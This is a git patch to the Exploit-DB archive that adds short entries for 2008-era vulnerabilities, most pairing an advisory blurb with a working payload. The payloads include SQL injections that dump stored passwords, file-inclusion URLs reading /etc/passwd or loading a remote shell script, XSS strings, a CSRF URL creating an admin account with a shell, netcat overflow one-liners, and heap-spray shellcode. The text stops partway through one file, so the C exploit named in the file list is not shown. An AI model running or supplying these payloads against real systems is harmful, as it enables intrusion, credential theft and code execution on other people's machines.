From 5de5e59242b6f3114a71a50836c31e6a3dffa387 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 23 Jan 2014 04:26:27 +0000
Subject: [PATCH] Updated 01_23_2014

---
 files.csv                           |  29 ++++
 platforms/asp/webapps/31117.txt     |   9 +
 platforms/hardware/remote/31133.txt |   9 +
 platforms/linux/remote/31127.txt    |   9 +
 platforms/multiple/dos/31128.txt    |  19 +++
 platforms/multiple/remote/31130.txt |  19 +++
 platforms/php/webapps/31107.txt     |   9 +
 platforms/php/webapps/31108.txt     |   9 +
 platforms/php/webapps/31109.txt     |   9 +
 platforms/php/webapps/31110.txt     |   9 +
 platforms/php/webapps/31111.txt     |  10 ++
 platforms/php/webapps/31112.txt     |  15 ++
 platforms/php/webapps/31115.txt     |   9 +
 platforms/php/webapps/31116.txt     |   9 +
 platforms/php/webapps/31120.txt     |  16 ++
 platforms/php/webapps/31121.txt     |   7 +
 platforms/php/webapps/31123.txt     |   9 +
 platforms/php/webapps/31124.txt     |   9 +
 platforms/php/webapps/31125.txt     |   9 +
 platforms/php/webapps/31126.txt     |   9 +
 platforms/php/webapps/31129.txt     |   7 +
 platforms/php/webapps/31131.txt     |  11 ++
 platforms/php/webapps/31134.txt     |   9 +
 platforms/php/webapps/31135.txt     |   8 +
 platforms/php/webapps/31137.txt     |   7 +
 platforms/windows/dos/31114.txt     |  25 +++
 platforms/windows/dos/31138.txt     |   9 +
 platforms/windows/dos/31139.txt     |   9 +
 platforms/windows/remote/31113.html |  45 +++++
 platforms/windows/remote/31118.c    | 249 ++++++++++++++++++++++++++++
 30 files changed, 611 insertions(+)
 create mode 100755 platforms/asp/webapps/31117.txt
 create mode 100755 platforms/hardware/remote/31133.txt
 create mode 100755 platforms/linux/remote/31127.txt
 create mode 100755 platforms/multiple/dos/31128.txt
 create mode 100755 platforms/multiple/remote/31130.txt
 create mode 100755 platforms/php/webapps/31107.txt
 create mode 100755 platforms/php/webapps/31108.txt
 create mode 100755 platforms/php/webapps/31109.txt
 create mode 100755 platforms/php/webapps/31110.txt
 create mode 100755 platforms/php/webapps/31111.txt
 create mode 100755 platforms/php/webapps/31112.txt
 create mode 100755 platforms/php/webapps/31115.txt
 create mode 100755 platforms/php/webapps/31116.txt
 create mode 100755 platforms/php/webapps/31120.txt
 create mode 100755 platforms/php/webapps/31121.txt
 create mode 100755 platforms/php/webapps/31123.txt
 create mode 100755 platforms/php/webapps/31124.txt
 create mode 100755 platforms/php/webapps/31125.txt
 create mode 100755 platforms/php/webapps/31126.txt
 create mode 100755 platforms/php/webapps/31129.txt
 create mode 100755 platforms/php/webapps/31131.txt
 create mode 100755 platforms/php/webapps/31134.txt
 create mode 100755 platforms/php/webapps/31135.txt
 create mode 100755 platforms/php/webapps/31137.txt
 create mode 100755 platforms/windows/dos/31114.txt
 create mode 100755 platforms/windows/dos/31138.txt
 create mode 100755 platforms/windows/dos/31139.txt
 create mode 100755 platforms/windows/remote/31113.html
 create mode 100755 platforms/windows/remote/31118.c

diff --git a/files.csv b/files.csv
index f96bcf99e..a1e1627e6 100755
--- a/files.csv
+++ b/files.csv
@@ -27932,3 +27932,32 @@ id,file,description,date,author,platform,type,port
 31103,platforms/asp/webapps/31103.txt,"AstroSoft HelpDesk operator/article/article_search_results.asp txtSearch Parameter XSS",2008-02-04,"Alexandr Polyakov",asp,webapps,0
 31104,platforms/asp/webapps/31104.txt,"AstroSoft HelpDesk operator/article/article_attachment.asp Attach_Id Parameter XSS",2008-02-04,"Alexandr Polyakov",asp,webapps,0
 31105,platforms/windows/dos/31105.py,"Titan FTP Server 6.05 build 550 DELE Command Remote Buffer Overflow Vulnerability",2008-02-04,j0rgan,windows,dos,0
+31107,platforms/php/webapps/31107.txt,"Portail Web Php 2.5.1 config/conf-activation.php site_path Parameter Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0
+31108,platforms/php/webapps/31108.txt,"Portail Web Php 2.5.1 menu/item.php site_path Parameter Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0
+31109,platforms/php/webapps/31109.txt,"Portail Web Php 2.5.1 modules/conf_modules.php site_path Parameter Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0
+31110,platforms/php/webapps/31110.txt,"Portail Web Php 2.5.1 system/login.php site_path Parameter Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0
+31111,platforms/php/webapps/31111.txt,"Download Management 1.00 for PHP-Fusion Multiple Local File Include Vulnerabilities",2008-02-05,Psiczn,php,webapps,0
+31112,platforms/php/webapps/31112.txt,"DevTracker Module For bcoos 1.1.11 and E-xoops 1.0.8 Multiple Cross-Site Scripting Vulnerabilities",2008-02-04,Lostmon,php,webapps,0
+31113,platforms/windows/remote/31113.html,"GlobalLink 2.6.1.2 'HanGamePlugincn18.dll' ActiveX Control Multiple Buffer Overflow Vulnerabilities",2008-02-05,anonymous,windows,remote,0
+31114,platforms/windows/dos/31114.txt,"Adobe Acrobat and Reader <= 8.1.1 Multiple Arbitrary Code Execution and Security Vulnerabilities",2008-02-06,"Paul Craig",windows,dos,0
+31115,platforms/php/webapps/31115.txt,"MyNews 1.6.x 'hash' Parameter Cross Site Scripting Vulnerability",2008-02-06,SkyOut,php,webapps,0
+31116,platforms/php/webapps/31116.txt,"Pagetool 1.07 'search_term' Parameter Cross-Site Scripting Vulnerability",2008-02-06,Phanter-Root,php,webapps,0
+31117,platforms/asp/webapps/31117.txt,"WS_FTP Server 6 /WSFTPSVR/FTPLogServer/LogViewer.asp Authentication Bypass",2008-02-06,"Luigi Auriemma",asp,webapps,0
+31118,platforms/windows/remote/31118.c,"Microsoft Works 8.0 File Converter Field Length Remote Code Execution Vulnerability",2008-02-06,"Luigi Auriemma",windows,remote,0
+31120,platforms/php/webapps/31120.txt,"MODx 0.9.6 index.php Multiple Parameter XSS",2008-02-07,"Alexandr Polyakov",php,webapps,0
+31121,platforms/php/webapps/31121.txt,"Joomla! and Mambo com_sermon 0.2 Component 'gid' Parameter SQL Injection Vulnerability",2008-02-07,S@BUN,php,webapps,0
+31123,platforms/php/webapps/31123.txt,"PowerScripts PowerNews 2.5.6 'subpage' Parameter Multiple Local File Include Vulnerabilities",2008-02-08,"Alexandr Polyakov",php,webapps,0
+31124,platforms/php/webapps/31124.txt,"Calimero.CMS 3.3 'id' Parameter Cross Site Scripting Vulnerability",2008-02-08,Psiczn,php,webapps,0
+31125,platforms/php/webapps/31125.txt,"Joovili 2.1 'members_help.php' Remote File Include Vulnerability",2008-02-08,Cr@zy_King,php,webapps,0
+31126,platforms/php/webapps/31126.txt,"Serendipity Freetag-plugin 2.95 'style' parameter Cross Site Scripting Vulnerability",2008-02-08,"Alexander Brachmann",php,webapps,0
+31127,platforms/linux/remote/31127.txt,"Mozilla Firefox <= 2.0.9 'view-source:' Scheme Information Disclosure Vulnerability",2008-02-08,"Ronald van den Heetkamp",linux,remote,0
+31128,platforms/multiple/dos/31128.txt,"Multiple IEA Software Products HTTP POST Request Denial of Service Vulnerability",2008-02-08,"Luigi Auriemma",multiple,dos,0
+31129,platforms/php/webapps/31129.txt,"Managed Workplace Service Center 4.x/5.x/6.x Installation Information Disclosure Vulnerability",2008-02-08,"Brook Powers",php,webapps,0
+31130,platforms/multiple/remote/31130.txt,"Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability",2008-02-09,"John Kew",multiple,remote,0
+31131,platforms/php/webapps/31131.txt,"PK-Designs PKs Movie Database 3.0.3 'index.php' SQL Injection and Cross-Site Scripting Vulnerabilities",2008-02-09,Houssamix,php,webapps,0
+31133,platforms/hardware/remote/31133.txt,"F5 BIG-IP 9.4.3 Web Management Interface Cross-Site Request Forgery Vulnerability",2008-02-11,nnposter,hardware,remote,0
+31134,platforms/php/webapps/31134.txt,"VWar 1.5 'calendar.php' SQL Injection Vulnerability",2008-02-11,Pouya_Server,php,webapps,0
+31135,platforms/php/webapps/31135.txt,"Rapid-Source Rapid-Recipe Component Multiple SQL Injection Vulnerabilities",2008-02-11,breaker_unit,php,webapps,0
+31137,platforms/php/webapps/31137.txt,"Joomla! and Mambo com_comments Component 0.5.8.5g 'id' Parameter SQL Injection Vulnerability",2008-02-11,CheebaHawk215,php,webapps,0
+31138,platforms/windows/dos/31138.txt,"Larson Network Print Server 9.4.2 build 105 (LstNPS) NPSpcSVR.exe License Command Remote Overflow",2008-02-11,"Luigi Auriemma",windows,dos,0
+31139,platforms/windows/dos/31139.txt,"Larson Network Print Server 9.4.2 build 105 (LstNPS) Logging Function USEP Command Remote Format String",2008-02-11,"Luigi Auriemma",windows,dos,0
diff --git a/platforms/asp/webapps/31117.txt b/platforms/asp/webapps/31117.txt
new file mode 100755
index 000000000..efb0f2b76
--- /dev/null
+++ b/platforms/asp/webapps/31117.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27654/info
+
+WS_FTP Server Manager is prone to an authentication-bypass vulnerability and an information-disclosure vulnerability.
+
+An attacker can exploit these issues to gain unauthorized access to the affected application and gain access to potentially sensitive information.
+
+These issues affect WS_FTP Server Manager 6.1.0.0; prior versions may also be affected. 
+
+http://www.example.com/WSFTPSVR/FTPLogServer/LogViewer.asp
\ No newline at end of file
diff --git a/platforms/hardware/remote/31133.txt b/platforms/hardware/remote/31133.txt
new file mode 100755
index 000000000..e686684c2
--- /dev/null
+++ b/platforms/hardware/remote/31133.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27720/info
+
+F5 BIG-IP is prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to execute arbitrary actions on an affected device.
+
+F5 BIG-IP 9.4.3 is vulnerable; other versions may also be affected. 
+
+https://www.example.com/tmui/Control/form?handler=%2Ftmui%2Fsystem%2Fbigpipe%2Fbigpipe&handler_before=&form_page=%2Ftmui%2Fsystem%2Fbigpipe%2Fbigpipe.jsp%3F&form_page_before=&bigpipe_output=&bigpipe_cmd_validation=NO_VALIDATION&bigpipe_cmd_before=&bigpipe_cmd=user+testuser+password+none+testpwd+shell+%2Fbin%2Fbash+role+administrator+in+all 
\ No newline at end of file
diff --git a/platforms/linux/remote/31127.txt b/platforms/linux/remote/31127.txt
new file mode 100755
index 000000000..f01a62b85
--- /dev/null
+++ b/platforms/linux/remote/31127.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27700/info
+
+Mozilla Firefox is prone to an information-disclosure vulnerability because it fails to restrict access to local resources.
+
+Attackers can exploit this issue to obtain potentially sensitive information that will aid in further attacks.
+
+Firefox 2.0.0.12 and prior versions are vulnerable.
+
+<script> /* @name: Firefox <= 2.0.0.12 information leak pOc @date: Feb. 07 2008 @author: Ronald van den Heetkamp @url: http://www.0x000000.com */ pref = function(a,b) { document.write( a + ' -> ' + b + '<br />'); }; </script> <script src="view-source:resource:///greprefs/all.js"></script> 
\ No newline at end of file
diff --git a/platforms/multiple/dos/31128.txt b/platforms/multiple/dos/31128.txt
new file mode 100755
index 000000000..0bd71bde7
--- /dev/null
+++ b/platforms/multiple/dos/31128.txt
@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/27701/info
+
+Multiple IEA Software products are prone to a denial-of-service vulnerability.
+
+Successfully exploiting this issue will allow attackers to crash the affected application, denying service to legitimate users.
+
+This issue affects the following applications:
+
+- Emerald 5.0.49 and prior versions
+- RadiusNT and RadiusX 5.1.38 and prior versions
+- Radius test client 4.0.20 and prior versions
+- Air Marshal 2.0.4 and prior versions 
+
+The following proof-of-concept exploit code is available:
+
+POST / HTTP/1.0
+Host: localhost
+Content-Length: 2147483647
+
diff --git a/platforms/multiple/remote/31130.txt b/platforms/multiple/remote/31130.txt
new file mode 100755
index 000000000..484e8ed9f
--- /dev/null
+++ b/platforms/multiple/remote/31130.txt
@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/27706/info
+
+Apache Tomcat is prone to an information-disclosure vulnerability because it fails to adequately sanitize user-supplied data.
+
+Attackers can exploit this issue to access potentially sensitive data that may aid in further attacks.
+
+Versions prior to Apache Tomcat 6.0.16 and 5.5.26 are vulnerable.
+
+NOTE: This vulnerability is caused by an incomplete fix for BID 25316 - Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities (CVE-2007-3385).
+
++++
+GET /myapp/MyCookies HTTP/1.1
+Host: localhost
+Cookie: name="val " ue"
+Cookie: name1=moi
++++
+
+http://www.example.com/examples/servlets/servlet/CookieExample?cookiename=test&cookievalue=test%5c%5c%22%3B+Expires%3DThu%2C+1+Jan+2009+00%3A00%3A01+UTC%
+3B+Path%3D%2Fservlets-examples%2Fservlet+%3B 
\ No newline at end of file
diff --git a/platforms/php/webapps/31107.txt b/platforms/php/webapps/31107.txt
new file mode 100755
index 000000000..3de3d5548
--- /dev/null
+++ b/platforms/php/webapps/31107.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27616/info
+
+Portail Web Php is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+These issues affect Portail Web Php 2.5.1.1; other versions may also be affected. 
+
+http://www.example.com/path/admin/system/config/conf-activation.php?site_path=http://www.example2.com
\ No newline at end of file
diff --git a/platforms/php/webapps/31108.txt b/platforms/php/webapps/31108.txt
new file mode 100755
index 000000000..495728ddb
--- /dev/null
+++ b/platforms/php/webapps/31108.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27616/info
+ 
+Portail Web Php is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+ 
+These issues affect Portail Web Php 2.5.1.1; other versions may also be affected. 
+
+http://www.example.com/path/admin/system/menu/item.php?site_path=http://www.example2.com
diff --git a/platforms/php/webapps/31109.txt b/platforms/php/webapps/31109.txt
new file mode 100755
index 000000000..2c6dedaf6
--- /dev/null
+++ b/platforms/php/webapps/31109.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27616/info
+  
+Portail Web Php is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+  
+Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+  
+These issues affect Portail Web Php 2.5.1.1; other versions may also be affected. 
+
+http://www.example.com/path/admin/system/modules/conf_modules.php?site_path=http://www.example2.com
\ No newline at end of file
diff --git a/platforms/php/webapps/31110.txt b/platforms/php/webapps/31110.txt
new file mode 100755
index 000000000..282c4c613
--- /dev/null
+++ b/platforms/php/webapps/31110.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27616/info
+   
+Portail Web Php is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+   
+Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+   
+These issues affect Portail Web Php 2.5.1.1; other versions may also be affected. 
+
+http://www.example.com/path/system/login.php?site_path=http://www.example2.com 
\ No newline at end of file
diff --git a/platforms/php/webapps/31111.txt b/platforms/php/webapps/31111.txt
new file mode 100755
index 000000000..6d6e3abf3
--- /dev/null
+++ b/platforms/php/webapps/31111.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/27618/info
+
+Download Management for PHP-Fusion is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Exploiting these issues may allow an attacker to access potentially sensitive information and execute arbitrary local scripts in the context of the affected application.
+
+These issues affect Download Management 1.00; other versions may also be vulnerable. 
+
+http://example.com/infusions/download_management/infusion.php?settings[locale]=LFI%00
+http://example.com/infusions/download_management/download_management.php?settings[locale]=LFI%00 
\ No newline at end of file
diff --git a/platforms/php/webapps/31112.txt b/platforms/php/webapps/31112.txt
new file mode 100755
index 000000000..001079122
--- /dev/null
+++ b/platforms/php/webapps/31112.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/27619/info
+
+DevTracker module for bcoos and E-xoops is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+These issues affect the following versions:
+
+bcoos 1.1.11 (and earlier) with DevTracker 3.0
+E-xoops 1.0.8 (and earlier) with DevTracker v0.20
+
+Other versions may also be vulnerable. 
+
+http://www.example.com/modules/devtracker/index.php?proj_id=1&order_by=priority&direction=ASCquot;><script>alert()</script> 
+http://www.example.com/modules/devtracker/index.php?proj_id=1&order_by=priorityquot;><script>alert()</script>&direction=ASC 
\ No newline at end of file
diff --git a/platforms/php/webapps/31115.txt b/platforms/php/webapps/31115.txt
new file mode 100755
index 000000000..77ce82058
--- /dev/null
+++ b/platforms/php/webapps/31115.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27652/info
+
+MyNews is prone to a cross-site scripting vulnerability.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+MyNews 1.6.4 and prior versions are vulnerable.
+
+http://www.example.com/index.php?hash="><iframe src=http://www.example2.com/ height=500px width=500px></iframe><!--&do=admin http://www.example.com/index.php?hash="><script>alert(1337);</script><!--&do=admin 
\ No newline at end of file
diff --git a/platforms/php/webapps/31116.txt b/platforms/php/webapps/31116.txt
new file mode 100755
index 000000000..9c085ebf2
--- /dev/null
+++ b/platforms/php/webapps/31116.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27653/info
+
+Pagetool is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Pagetool 1.0.7 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[path]/index.php?name=pagetool_search&search_term=[XSS] 
\ No newline at end of file
diff --git a/platforms/php/webapps/31120.txt b/platforms/php/webapps/31120.txt
new file mode 100755
index 000000000..c5e8c13aa
--- /dev/null
+++ b/platforms/php/webapps/31120.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/27672/info
+
+MODx is prone to an HTML-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+MODx 0.9.6.1 and 0.9.6.1p1 are vulnerable; other versions may also be affected. 
+
+http://www.example.com/[installdir]/manager/index.php?a=75&search="><IMG 
+SRC="javascript:alert(&#039;DSecRG XSS&#039;)
+http://www.example.com/[installdir]/manager/index.php?a=84&search="><IMG 
+SRC="javascript:alert(&#039;DSecRG XSS&#039;) 
+http://www.example.com/[installdir]/index.php?searched=modx&highlight="><IMG 
+SRC="javascript:alert(&#039;DSecRG XSS&#039;) 
+http://www.example.com/[installdir]/manager/index.php?a=&#039;<img 
+src="javascript:alert(&#039;DSecRG XSS&#039;)"> 
\ No newline at end of file
diff --git a/platforms/php/webapps/31121.txt b/platforms/php/webapps/31121.txt
new file mode 100755
index 000000000..6f9358c5e
--- /dev/null
+++ b/platforms/php/webapps/31121.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27673/info
+
+The Joomla! and Mambo 'com_sermon' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0,0,username,password%2C0%2C0%2C0/**/from/**/mos_users/* 
\ No newline at end of file
diff --git a/platforms/php/webapps/31123.txt b/platforms/php/webapps/31123.txt
new file mode 100755
index 000000000..bca608b87
--- /dev/null
+++ b/platforms/php/webapps/31123.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27688/info
+
+PowerScripts PowerNews is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Exploiting these issues may allow an attacker to access potentially sensitive information and execute arbitrary local scripts in the context of the affected application.
+
+PowerNews 2.5.6 is vulnerable; other versions may also be affected. 
+
+http://example.com/[installdir]/pnadmin/categories.inc.php?subpage=../../../../../../../../../../../../../etc/passwd%00 
\ No newline at end of file
diff --git a/platforms/php/webapps/31124.txt b/platforms/php/webapps/31124.txt
new file mode 100755
index 000000000..9436c043a
--- /dev/null
+++ b/platforms/php/webapps/31124.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27690/info
+
+Calimero.CMS is prone to a cross-site scripting vulnerability.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Calimero.CMS 3.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?class=calimero_webpage&id="><script>alert(/vulnxss/)</script> 
\ No newline at end of file
diff --git a/platforms/php/webapps/31125.txt b/platforms/php/webapps/31125.txt
new file mode 100755
index 000000000..45970ea59
--- /dev/null
+++ b/platforms/php/webapps/31125.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27693/info
+
+Joovili is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
+
+Joovili 2.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/members_help.php?hlp=http://www.example2.com/shell.txt? 
\ No newline at end of file
diff --git a/platforms/php/webapps/31126.txt b/platforms/php/webapps/31126.txt
new file mode 100755
index 000000000..91af9b62c
--- /dev/null
+++ b/platforms/php/webapps/31126.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27697/info
+
+Serendipity Freetag-plugin is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting this issue could allow an attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+This issue affects Serendipity Freetag-plugin 2.95; prior versions may also be affected. 
+
+http://www.example.com/plugin/tag/%3Cdiv%20style=[XSS] 
\ No newline at end of file
diff --git a/platforms/php/webapps/31129.txt b/platforms/php/webapps/31129.txt
new file mode 100755
index 000000000..72e5e1cc0
--- /dev/null
+++ b/platforms/php/webapps/31129.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27702/info
+
+Managed Workplace Service Center is prone to an information-disclosure vulnerability because the application fails to protect private information.
+
+Attackers may exploit this issue to retrieve sensitive information that may aid in further attacks.
+
+http://www.example.com/About/SC_About.htm 
\ No newline at end of file
diff --git a/platforms/php/webapps/31131.txt b/platforms/php/webapps/31131.txt
new file mode 100755
index 000000000..5b378cf32
--- /dev/null
+++ b/platforms/php/webapps/31131.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/27713/info
+
+PKs Movie Database is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+These issues affect PKs Movie Database 3.0.3; other versions may also be affected. 
+
+http://www.example.com/path/index.php?num=[SQL]
+http://www.example.com/path/index.php?category=[XSS]
+http://www.example.com/path/index.php?num=9999999999&category=[XSS] 
\ No newline at end of file
diff --git a/platforms/php/webapps/31134.txt b/platforms/php/webapps/31134.txt
new file mode 100755
index 000000000..06e8b8236
--- /dev/null
+++ b/platforms/php/webapps/31134.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27722/info
+
+VWar is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+VWar 1.5.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/vwar/calendar.php?month=[SQL] 
\ No newline at end of file
diff --git a/platforms/php/webapps/31135.txt b/platforms/php/webapps/31135.txt
new file mode 100755
index 000000000..34910d3a2
--- /dev/null
+++ b/platforms/php/webapps/31135.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/27724/info
+
+Rapid-Recipe is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_rapidrecipe&page=showuser&user_id=-1+union+all+select+concat(username,0x3a,password)+from+jos_users+limit+0,20--
+http://www.example.com/index.php?option=com_rapidrecipe&page=viewcategorysrecipes&category_id=-1+union+all+select+concat(username,0x3a,password),2+from+jos_users+limit+0,20-- 
\ No newline at end of file
diff --git a/platforms/php/webapps/31137.txt b/platforms/php/webapps/31137.txt
new file mode 100755
index 000000000..63f1456cf
--- /dev/null
+++ b/platforms/php/webapps/31137.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27731/info
+
+The Joomla! and Mambo 'com_comments' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSWORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+from+mos_content_comments+where+1=1 
\ No newline at end of file
diff --git a/platforms/windows/dos/31114.txt b/platforms/windows/dos/31114.txt
new file mode 100755
index 000000000..452c3e302
--- /dev/null
+++ b/platforms/windows/dos/31114.txt
@@ -0,0 +1,25 @@
+source: http://www.securityfocus.com/bid/27641/info
+
+Adobe Acrobat and Reader are prone to multiple arbitrary remote code-execution and security vulnerabilities.
+
+Attackers can exploit these issues to execute arbitrary code in the context of the user running the affected application. Other attacks are also possible.
+
+Versions prior to Adobe Acrobat and Adobe Reader 8.1.2 are vulnerable to these issues. 
+
+function repeat(count,what) {
+   var v = "";
+   while (--count >= 0) v += what;
+   return v;
+}
+function heapspray(shellcode) {
+   block='';
+   fillblock = unescape("%u9090");
+   while(block.length+20+shellcode.length<0x40000) 
+      block = block+block+fillblock;
+   arr = new Array();
+   for (i=0;i<200;i++) arr[i]=block + shellcode;
+}
+
+heapspray(unescape(“%ucccc%ucccc”));
+Collab.collectEmailInfo({
+   msg:repeat(4096, unescape("%u0909%u0909"))});
diff --git a/platforms/windows/dos/31138.txt b/platforms/windows/dos/31138.txt
new file mode 100755
index 000000000..c4e47a754
--- /dev/null
+++ b/platforms/windows/dos/31138.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27732/info
+
+Larson Software Technology Network Print Server is prone to a format-string vulnerability and a buffer-overflow vulnerability.
+
+An attacker can exploit these issues to execute arbitrary code within the context of the affected application or crash the application, denying service to legitimate users.
+
+Network Print Server 9.4.2 build 105 and prior versions are affected. 
+
+echo LICENSE aaaaa...160...aaaaa|nc SERVER 3114 -v -v 
\ No newline at end of file
diff --git a/platforms/windows/dos/31139.txt b/platforms/windows/dos/31139.txt
new file mode 100755
index 000000000..6f502069f
--- /dev/null
+++ b/platforms/windows/dos/31139.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27732/info
+ 
+Larson Software Technology Network Print Server is prone to a format-string vulnerability and a buffer-overflow vulnerability.
+ 
+An attacker can exploit these issues to execute arbitrary code within the context of the affected application or crash the application, denying service to legitimate users.
+ 
+Network Print Server 9.4.2 build 105 and prior versions are affected. 
+
+echo USEP %n%n%n%s%s%s|nc SERVER 3114 -v -v 
\ No newline at end of file
diff --git a/platforms/windows/remote/31113.html b/platforms/windows/remote/31113.html
new file mode 100755
index 000000000..31edaf156
--- /dev/null
+++ b/platforms/windows/remote/31113.html
@@ -0,0 +1,45 @@
+source: http://www.securityfocus.com/bid/27626/info
+
+GlobalLink is prone to multiple buffer-overflow vulnerabilities because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.
+
+An attacker can exploit these issues to execute arbitrary code within the context of application that invoked the ActiveX control (typically Internet Explorer). Failed exploit attempts will result in a denial-of-service condition.
+
+These issues affect GlobalLink 2.8.1.2 beta and 2.6.1.29; other versions may also be affected. 
+
+<%@ LANGUAGE = JavaScript %>
+<%
+
+var act=new ActiveXObject("HanGamePluginCn18.HanGamePluginCn18.1");
+
+//run calc.exe
+var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
+
+var bigblock = unescape("%u9090%u9090");
+
+var headersize = 20;
+
+var slackspace = headersize+shellcode.length;
+
+while (bigblock.length<slackspace) bigblock+=bigblock;
+
+fillblock = bigblock.substring(0, slackspace);
+
